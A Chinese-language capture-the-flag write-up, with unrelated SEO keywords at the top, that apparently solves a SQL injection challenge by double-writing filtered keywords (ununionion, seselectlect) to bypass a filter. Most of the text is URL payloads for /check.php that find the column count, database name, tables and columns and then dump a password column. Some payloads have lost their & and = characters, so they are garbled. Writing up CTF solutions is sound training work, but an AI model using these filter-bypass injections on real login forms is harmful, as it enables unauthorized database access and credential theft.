宁波网站建设制作推广,互联网产品推广方案范文,阿里云网络服务,万州网题目 点进页面显示如下 查看源代码 先尝试一下万能密码 没用#xff0c;or被过滤了 试着双写看看 回显一串#xff0c;也不是flag 先查询列数尝试一下#xff0c;把union select过滤了#xff0c;使用双写 构造payload
/check.php?usernameadminpassword1 %27 ununi…题目 点进页面显示如下 查看源代码 先尝试一下万能密码 没用or被过滤了 试着双写看看 回显一串也不是flag 先查询列数尝试一下把union select过滤了使用双写 构造payload
/check.php?usernameadminpassword1 %27 ununionion seselectlect 1 %23 显示列数不对往上加加到3
tips因为要回显所以需要设一个不是数据里面的用户直接改成amdin1回显字段为2和3 成功
先查询数据库
构造payload
/check.php?usernameadminpassword1 %27 ununionion seselectlect 1,2,database() %23得到数据库geek 查询表
/check.php?usernameadminpassword11 uunionnion sselectelect 1,(sselectelect group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schemageek),3 %23
// 出现重写的都是被过滤的有两个表查询表中字段
/check.php?usernameadminpassword1 uunionnion sselectelect 1,(sselectelect group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schemageek),(sselectelect group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_nameb4bsql)%23
得到三个字段 查询字段中的数据
/check.php?usernameadminpassword1 uunionnion sselectelect 1,(sselectelect group_concat(passwoorrd) ffromrom b4bsql),(sselectelect group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_nameb4bsql)%23 查看源代码可得到flag 总结
考查重写绕过
